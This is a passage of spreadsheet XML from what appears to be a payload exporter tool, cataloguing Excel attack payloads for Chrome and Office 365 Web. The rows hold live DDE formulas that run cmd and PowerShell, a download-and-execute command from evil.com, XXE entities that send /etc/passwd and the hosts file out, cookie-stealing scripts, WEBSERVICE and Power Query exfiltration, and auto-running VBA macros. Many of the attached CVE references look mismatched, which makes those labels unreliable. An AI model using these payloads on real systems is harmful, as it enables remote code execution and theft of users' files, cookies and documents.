      <c r="A67" t="inlineStr"/>
    </row>
    <row r="68">
      <c r="A68" t="inlineStr">
        <is>
          <t>Generated: 2025-07-27 15:29:02 UTC</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" t="inlineStr">
        <is>
          <t>Tool: Excel Browser Rendering Payload Exporter v2.0</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" t="inlineStr">
        <is>
          <t>Author: SNGWN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CHROME - Excel Browser Rendering Payloads</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>Total chrome Excel payloads: 12</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="inlineStr">
        <is>
          <t>Focus: Chrome Excel rendering - Google Drive integration, Chromium-based Excel viewer, V8 engine exploitation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excel_browser_0001</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>dde_command_execution</t>
        </is>
      </c>
      <c r="F5" s="5">
        <f>cmd|'/c calc.exe'!A1</f>
        <v/>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Excel 97-2003 DDE (Dynamic Data Exchange) command execution in Chrome when opened from web</t>
        </is>
      </c>
      <c r="H5" s="5" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>CVE-2017-8759, CVE-2017-11826, CVE-2018-0802</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>Chrome opens legacy Excel files directly, DDE formulas can execute system commands</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>Legacy .xls format has minimal security warnings in older browser versions</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" t="inlineStr">
        <is>
          <t>excel_browser_0007</t>
        </is>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D6" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E6" t="inlineStr">
        <is>
          <t>excel_activex_browser</t>
        </is>
      </c>
      <c r="F6" t="inlineStr">
        <is>
          <t>&lt;script&gt;try{parent.window.location='https://evil.com/harvest?cookie='+document.cookie}catch(e){}&lt;/script&gt;</t>
        </is>
      </c>
      <c r="G6" t="inlineStr">
        <is>
          <t>Chrome Excel ActiveX control DOM access when embedded in web page</t>
        </is>
      </c>
      <c r="H6" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I6" t="inlineStr">
        <is>
          <t>CVE-2019-1367, CVE-2020-1380</t>
        </is>
      </c>
      <c r="J6" t="inlineStr">
        <is>
          <t>Chrome Excel plugin can access parent DOM in certain configurations</t>
        </is>
      </c>
      <c r="K6" t="inlineStr">
        <is>
          <t>ActiveX trusted sites, embedded Excel objects in web pages</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="inlineStr">
        <is>
          <t>excel_browser_0012</t>
        </is>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D7" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E7" t="inlineStr">
        <is>
          <t>shared_strings_xxe</t>
        </is>
      </c>
      <c r="F7" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE sharedStrings [&lt;!ENTITY xxe SYSTEM "http://evil.com/exfil?data=file:///etc/passwd"&gt;]&gt;&lt;sst&gt;&amp;xxe;&lt;/sst&gt;</t>
        </is>
      </c>
      <c r="G7" t="inlineStr">
        <is>
          <t>Chrome Excel shared strings XXE for data exfiltration via HTTP requests</t>
        </is>
      </c>
      <c r="H7" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I7" t="inlineStr">
        <is>
          <t>CVE-2019-0669, CVE-2020-0674</t>
        </is>
      </c>
      <c r="J7" t="inlineStr">
        <is>
          <t>Chrome processes xlsx shared strings XML, XXE can exfiltrate data via HTTP</t>
        </is>
      </c>
      <c r="K7" t="inlineStr">
        <is>
          <t>Excel shared strings appear as normal data, HTTP exfiltration to external server</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" t="inlineStr">
        <is>
          <t>excel_browser_0019</t>
        </is>
      </c>
      <c r="B8" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D8" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E8" t="inlineStr">
        <is>
          <t>nested_formula_injection</t>
        </is>
      </c>
      <c r="F8">
        <f>1+1+cmd|'/c powershell -exec bypass -c "IEX(wget https://evil.com/payload -UseBasicParsing).Content"'!A1</f>
        <v/>
      </c>
      <c r="G8" t="inlineStr">
        <is>
          <t>Chrome CSV nested formula injection for remote PowerShell payload execution</t>
        </is>
      </c>
      <c r="H8" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I8" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2020-6418</t>
        </is>
      </c>
      <c r="J8" t="inlineStr">
        <is>
          <t>Chrome processes CSV formulas when opening in Excel, nested execution bypasses simple filters</t>
        </is>
      </c>
      <c r="K8" t="inlineStr">
        <is>
          <t>Nested formula structure evades basic detection, PowerShell download and execute</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="inlineStr">
        <is>
          <t>excel_browser_0022</t>
        </is>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D9" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E9" t="inlineStr">
        <is>
          <t>power_query_injection</t>
        </is>
      </c>
      <c r="F9" t="inlineStr">
        <is>
          <t>let Source = Web.Contents("https://evil.com/api?query="&amp;Text.From(Excel.CurrentWorkbook(){[Name="Sheet1"]}[Content]{0}[Column1])) in Source</t>
        </is>
      </c>
      <c r="G9" t="inlineStr">
        <is>
          <t>Chrome Excel Power Query injection for data exfiltration via web service</t>
        </is>
      </c>
      <c r="H9" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I9" t="inlineStr">
        <is>
          <t>CVE-2021-28449, CVE-2021-31174</t>
        </is>
      </c>
      <c r="J9" t="inlineStr">
        <is>
          <t>Chrome Excel Power Query can make external HTTP requests with worksheet data</t>
        </is>
      </c>
      <c r="K9" t="inlineStr">
        <is>
          <t>Power Query appears as legitimate data connection, worksheet data exfiltration</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" t="inlineStr">
        <is>
          <t>excel_browser_0028</t>
        </is>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D10" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E10" t="inlineStr">
        <is>
          <t>http_request_library</t>
        </is>
      </c>
      <c r="F10" t="inlineStr">
        <is>
          <t>Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "POST", "https://evil.com/exfil", False
http.Send ActiveSheet.UsedRange.Value</t>
        </is>
      </c>
      <c r="G10" t="inlineStr">
        <is>
          <t>Chrome Excel macro HTTP library abuse for worksheet data exfiltration</t>
        </is>
      </c>
      <c r="H10" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I10" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2021-21166</t>
        </is>
      </c>
      <c r="J10" t="inlineStr">
        <is>
          <t>Chrome Excel macros can use XMLHTTP for external communications</t>
        </is>
      </c>
      <c r="K10" t="inlineStr">
        <is>
          <t>XMLHTTP appears as web service integration, worksheet data theft</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="inlineStr">
        <is>
          <t>excel_browser_0034</t>
        </is>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D11" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E11" t="inlineStr">
        <is>
          <t>binary_xml_parameter_entity</t>
        </is>
      </c>
      <c r="F11" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE root [&lt;!ENTITY % param SYSTEM "https://evil.com/dtd"&gt;%param;]&gt;</t>
        </is>
      </c>
      <c r="G11" t="inlineStr">
        <is>
          <t>Chrome Excel binary XML parameter entity for remote DTD loading</t>
        </is>
      </c>
      <c r="H11" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I11" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2020-6418</t>
        </is>
      </c>
      <c r="J11" t="inlineStr">
        <is>
          <t>Chrome processes binary XML with parameter entities for remote DTD</t>
        </is>
      </c>
      <c r="K11" t="inlineStr">
        <is>
          <t>Parameter entities enable remote DTD loading and XXE chaining</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" t="inlineStr">
        <is>
          <t>excel_browser_0039</t>
        </is>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C12" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D12" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E12" t="inlineStr">
        <is>
          <t>chrome_native_messaging</t>
        </is>
      </c>
      <c r="F12" t="inlineStr">
        <is>
          <t>chrome.runtime.connectNative('com.evil.host').postMessage({cmd: 'exec', payload: 'calc.exe'});</t>
        </is>
      </c>
      <c r="G12" t="inlineStr">
        <is>
          <t>Chrome Excel native messaging abuse for host application communication</t>
        </is>
      </c>
      <c r="H12" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I12" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2021-21166</t>
        </is>
      </c>
      <c r="J12" t="inlineStr">
        <is>
          <t>Chrome Excel can use native messaging for external application communication</t>
        </is>
      </c>
      <c r="K12" t="inlineStr">
        <is>
          <t>Native messaging appears as legitimate browser extension functionality</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" t="inlineStr">
        <is>
          <t>excel_browser_0044</t>
        </is>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C13" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D13" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E13" t="inlineStr">
        <is>
          <t>chrome_devtools_protocol</t>
        </is>
      </c>
      <c r="F13" t="inlineStr">
        <is>
          <t>{"id": 1, "method": "Runtime.evaluate", "params": {"expression": "fetch('https://evil.com/exfil', {method: 'POST', body: JSON.stringify(document.cookie)})"}}</t>
        </is>
      </c>
      <c r="G13" t="inlineStr">
        <is>
          <t>Chrome Excel DevTools Protocol abuse for runtime JavaScript execution</t>
        </is>
      </c>
      <c r="H13" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I13" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2021-21166</t>
        </is>
      </c>
      <c r="J13" t="inlineStr">
        <is>
          <t>Chrome DevTools Protocol can execute JavaScript in Excel web context</t>
        </is>
      </c>
      <c r="K13" t="inlineStr">
        <is>
          <t>DevTools Protocol appears as debugging functionality, JavaScript execution</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" t="inlineStr">
        <is>
          <t>excel_browser_0050</t>
        </is>
      </c>
      <c r="B14" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C14" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D14" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E14" t="inlineStr">
        <is>
          <t>chrome_extension_message_passing</t>
        </is>
      </c>
      <c r="F14">
        <f>CONCATENATE("chrome-extension://","extension_id","/content.js?msg=",ENCODEURL("execute:powershell -enc &lt;base64&gt;"))</f>
        <v/>
      </c>
      <c r="G14" t="inlineStr">
        <is>
          <t>Chrome CSV injection targeting installed extensions via message passing</t>
        </is>
      </c>
      <c r="H14" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I14" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2020-6418, CVE-2021-21166</t>
        </is>
      </c>
      <c r="J14" t="inlineStr">
        <is>
          <t>Chrome CSV processing can trigger extension message passing</t>
        </is>
      </c>
      <c r="K14" t="inlineStr">
        <is>
          <t>Extension message passing bypasses typical URL filtering</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" t="inlineStr">
        <is>
          <t>excel_browser_0053</t>
        </is>
      </c>
      <c r="B15" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C15" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D15" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E15" t="inlineStr">
        <is>
          <t>chrome_headless_devtools_abuse</t>
        </is>
      </c>
      <c r="F15" t="inlineStr">
        <is>
          <t>chrome.debugger.sendCommand({tabId: chrome.tabs.TAB_ID_NONE}, 'Runtime.evaluate', {expression: 'fetch("https://evil.com/exfil", {method: "POST", body: document.cookie})'});</t>
        </is>
      </c>
      <c r="G15" t="inlineStr">
        <is>
          <t>Chrome Excel headless DevTools abuse for cookie exfiltration via Runtime.evaluate</t>
        </is>
      </c>
      <c r="H15" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I15" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2020-6418, CVE-2021-21166</t>
        </is>
      </c>
      <c r="J15" t="inlineStr">
        <is>
          <t>Chrome headless mode DevTools can evaluate JavaScript in Excel context</t>
        </is>
      </c>
      <c r="K15" t="inlineStr">
        <is>
          <t>DevTools appear as debugging functionality, cookie theft</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" t="inlineStr">
        <is>
          <t>excel_browser_0058</t>
        </is>
      </c>
      <c r="B16" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C16" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D16" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E16" t="inlineStr">
        <is>
          <t>service_worker_registration_abuse</t>
        </is>
      </c>
      <c r="F16" t="inlineStr">
        <is>
          <t>navigator.serviceWorker.register('/sw.js').then(reg =&gt; reg.active.postMessage({action: 'exfil', data: btoa(document.body.innerHTML)}));</t>
        </is>
      </c>
      <c r="G16" t="inlineStr">
        <is>
          <t>Chrome Excel Service Worker registration abuse for persistent background data exfiltration</t>
        </is>
      </c>
      <c r="H16" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I16" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2020-6418, CVE-2021-21166</t>
        </is>
      </c>
      <c r="J16" t="inlineStr">
        <is>
          <t>Chrome Excel can register Service Workers for background processing</t>
        </is>
      </c>
      <c r="K16" t="inlineStr">
        <is>
          <t>Service Workers persist across sessions, background data theft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OFFICE365_WEB - Excel Browser Rendering Payloads</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>Total office365_web Excel payloads: 11</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="inlineStr">
        <is>
          <t>Focus: Office 365 Web Excel - Browser-based Excel application, SharePoint integration, Office.js APIs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excel_browser_0002</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>webservice_external_data</t>
        </is>
      </c>
      <c r="F5" s="5">
        <f>WEBSERVICE("https://evil.com/exfil?data="&amp;A1)</f>
        <v/>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Office 365 Web Excel WEBSERVICE function for data exfiltration</t>
        </is>
      </c>
      <c r="H5" s="5" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>CVE-2019-1155, CVE-2020-1193</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>Office 365 web app executes WEBSERVICE formulas with user data</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>Trusted domain lists often include legitimate-looking domains</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" t="inlineStr">
        <is>
          <t>excel_browser_0009</t>
        </is>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D6" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E6" t="inlineStr">
        <is>
          <t>workbook_open_event</t>
        </is>
      </c>
      <c r="F6" t="inlineStr">
        <is>
          <t>Private Sub Workbook_Open()
CreateObject("WScript.Shell").Run "powershell -windowstyle hidden -exec bypass -c &lt;payload&gt;"
End Sub</t>
        </is>
      </c>
      <c r="G6" t="inlineStr">
        <is>
          <t>Office 365 Web Excel macro execution via Workbook_Open event handler</t>
        </is>
      </c>
      <c r="H6" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I6" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-31201</t>
        </is>
      </c>
      <c r="J6" t="inlineStr">
        <is>
          <t>Office 365 web can execute macros if user enables macro execution</t>
        </is>
      </c>
      <c r="K6" t="inlineStr">
        <is>
          <t>Legitimate-looking business document, macro enable prompts</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="inlineStr">
        <is>
          <t>excel_browser_0013</t>
        </is>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D7" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E7" t="inlineStr">
        <is>
          <t>dynamic_data_exchange</t>
        </is>
      </c>
      <c r="F7" t="inlineStr">
        <is>
          <t>@SUM(1+1)*cmd|'/c powershell -enc &lt;base64&gt;'!A0</t>
        </is>
      </c>
      <c r="G7" t="inlineStr">
        <is>
          <t>Office 365 Web CSV injection with DDE for remote command execution</t>
        </is>
      </c>
      <c r="H7" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I7" t="inlineStr">
        <is>
          <t>CVE-2017-8759, CVE-2018-0802</t>
        </is>
      </c>
      <c r="J7" t="inlineStr">
        <is>
          <t>Office 365 processes CSV DDE formulas, can execute system commands</t>
        </is>
      </c>
      <c r="K7" t="inlineStr">
        <is>
          <t>CSV format trusted for data import, DDE appears as calculation</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" t="inlineStr">
        <is>
          <t>excel_browser_0018</t>
        </is>
      </c>
      <c r="B8" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D8" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E8" t="inlineStr">
        <is>
          <t>workbook_xml_xxe</t>
        </is>
      </c>
      <c r="F8" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE workbook [&lt;!ENTITY xxe SYSTEM "https://evil.com/exfil?data=file:///windows/system32/drivers/etc/hosts"&gt;]&gt;&lt;workbook&gt;&amp;xxe;&lt;/workbook&gt;</t>
        </is>
      </c>
      <c r="G8" t="inlineStr">
        <is>
          <t>Office 365 Web Excel workbook XML XXE for file disclosure via HTTP exfiltration</t>
        </is>
      </c>
      <c r="H8" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I8" t="inlineStr">
        <is>
          <t>CVE-2019-0540, CVE-2020-1342</t>
        </is>
      </c>
      <c r="J8" t="inlineStr">
        <is>
          <t>Office 365 web processes workbook XML, XXE can read and exfiltrate files</t>
        </is>
      </c>
      <c r="K8" t="inlineStr">
        <is>
          <t>Cloud environment XXE, HTTP exfiltration to external server</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="inlineStr">
        <is>
          <t>excel_browser_0023</t>
        </is>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D9" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E9" t="inlineStr">
        <is>
          <t>office_js_api_abuse</t>
        </is>
      </c>
      <c r="F9" t="inlineStr">
        <is>
          <t>Office.context.document.getFileAsync(Office.FileType.Compressed, function(result) { fetch('https://evil.com/exfil', {method: 'POST', body: result.value.file}); });</t>
        </is>
      </c>
      <c r="G9" t="inlineStr">
        <is>
          <t>Office 365 Web Excel Office.js API abuse for document exfiltration</t>
        </is>
      </c>
      <c r="H9" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I9" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-42321</t>
        </is>
      </c>
      <c r="J9" t="inlineStr">
        <is>
          <t>Office 365 web Excel supports Office.js APIs for file operations</t>
        </is>
      </c>
      <c r="K9" t="inlineStr">
        <is>
          <t>Office.js appears as legitimate add-in functionality, document data theft</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" t="inlineStr">
        <is>
          <t>excel_browser_0029</t>
        </is>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D10" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E10" t="inlineStr">
        <is>
          <t>binary_macro_storage</t>
        </is>
      </c>
      <c r="F10" t="inlineStr">
        <is>
          <t>Binary encoded VBA macro: CreateObject("Wscript.Shell").Run "cmd /c &lt;payload&gt;"</t>
        </is>
      </c>
      <c r="G10" t="inlineStr">
        <is>
          <t>Office 365 Web Excel binary macro storage for AV evasion</t>
        </is>
      </c>
      <c r="H10" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I10" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-42292</t>
        </is>
      </c>
      <c r="J10" t="inlineStr">
        <is>
          <t>Office 365 web processes binary macro storage in xlsb format</t>
        </is>
      </c>
      <c r="K10" t="inlineStr">
        <is>
          <t>Binary encoding evades text-based detection, command execution</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="inlineStr">
        <is>
          <t>excel_browser_0035</t>
        </is>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D11" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E11" t="inlineStr">
        <is>
          <t>office365_power_automate</t>
        </is>
      </c>
      <c r="F11">
        <f>CONCATENATE("https://prod-","xx",".westus.logic.azure.com:443/workflows/","evil_workflow_id","/triggers/manual/paths/invoke?api-version=2016-10-01&amp;sp=%2Ftriggers%2Fmanual%2Frun&amp;sv=1.0&amp;sig=","evil_signature")</f>
        <v/>
      </c>
      <c r="G11" t="inlineStr">
        <is>
          <t>Office 365 Web CSV injection targeting Power Automate webhook for data exfiltration</t>
        </is>
      </c>
      <c r="H11" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I11" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-42321</t>
        </is>
      </c>
      <c r="J11" t="inlineStr">
        <is>
          <t>Office 365 web can process CSV formulas that trigger Power Automate workflows</t>
        </is>
      </c>
      <c r="K11" t="inlineStr">
        <is>
          <t>Power Automate webhooks appear as legitimate business automation</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" t="inlineStr">
        <is>
          <t>excel_browser_0040</t>
        </is>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C12" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D12" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E12" t="inlineStr">
        <is>
          <t>azure_blob_xxe</t>
        </is>
      </c>
      <c r="F12" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE root [&lt;!ENTITY xxe SYSTEM "https://evilstorage.blob.core.windows.net/container/payload.xml"&gt;]&gt;&lt;root&gt;&amp;xxe;&lt;/root&gt;</t>
        </is>
      </c>
      <c r="G12" t="inlineStr">
        <is>
          <t>Office 365 Web Excel XXE targeting Azure Blob Storage for payload retrieval</t>
        </is>
      </c>
      <c r="H12" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I12" t="inlineStr">
        <is>
          <t>CVE-2019-0540, CVE-2021-31199</t>
        </is>
      </c>
      <c r="J12" t="inlineStr">
        <is>
          <t>Office 365 web XXE can access Azure Blob Storage with proper credentials</t>
        </is>
      </c>
      <c r="K12" t="inlineStr">
        <is>
          <t>Azure Blob Storage appears as legitimate cloud storage, trusted domain</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" t="inlineStr">
        <is>
          <t>excel_browser_0045</t>
        </is>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C13" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D13" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E13" t="inlineStr">
        <is>
          <t>sharepoint_rest_api_abuse</t>
        </is>
      </c>
      <c r="F13" t="inlineStr">
        <is>
          <t>fetch('https://tenant.sharepoint.com/_api/web/lists/getbytitle("Documents")/items', {method: 'POST', headers: {'Accept': 'application/json', 'Content-Type': 'application/json'}, body: JSON.stringify({Title: 'ExfilData', FileLeafRef: btoa(document.body.innerHTML)})});</t>
        </is>
      </c>
      <c r="G13" t="inlineStr">
        <is>
          <t>Office 365 Web Excel SharePoint REST API abuse for document creation and data exfiltration</t>
        </is>
      </c>
      <c r="H13" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I13" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-42321</t>
        </is>
      </c>
      <c r="J13" t="inlineStr">
        <is>
          <t>Office 365 web Excel can use SharePoint REST APIs for document operations</t>
        </is>
      </c>
      <c r="K13" t="inlineStr">
        <is>
          <t>SharePoint REST API appears as legitimate document management</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" t="inlineStr">
        <is>
          <t>excel_browser_0051</t>
        </is>
      </c>
      <c r="B14" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C14" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D14" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E14" t="inlineStr">
        <is>
          <t>teams_integration_abuse</t>
        </is>
      </c>
      <c r="F14" t="inlineStr">
        <is>
          <t>microsoftTeams.initialize(); microsoftTeams.executeDeepLink('https://teams.microsoft.com/l/chat/0/0?users=attacker@evil.com&amp;message=' + btoa(document.body.innerHTML));</t>
        </is>
      </c>
      <c r="G14" t="inlineStr">
        <is>
          <t>Office 365 Web Excel Microsoft Teams integration abuse for data exfiltration via chat</t>
        </is>
      </c>
      <c r="H14" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I14" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-42321, CVE-2022-21989</t>
        </is>
      </c>
      <c r="J14" t="inlineStr">
        <is>
          <t>Office 365 Excel can use Teams integration for external communication</t>
        </is>
      </c>
      <c r="K14" t="inlineStr">
        <is>
          <t>Teams integration appears as legitimate collaboration feature</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" t="inlineStr">
        <is>
          <t>excel_browser_0057</t>
        </is>
      </c>
      <c r="B15" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C15" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D15" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
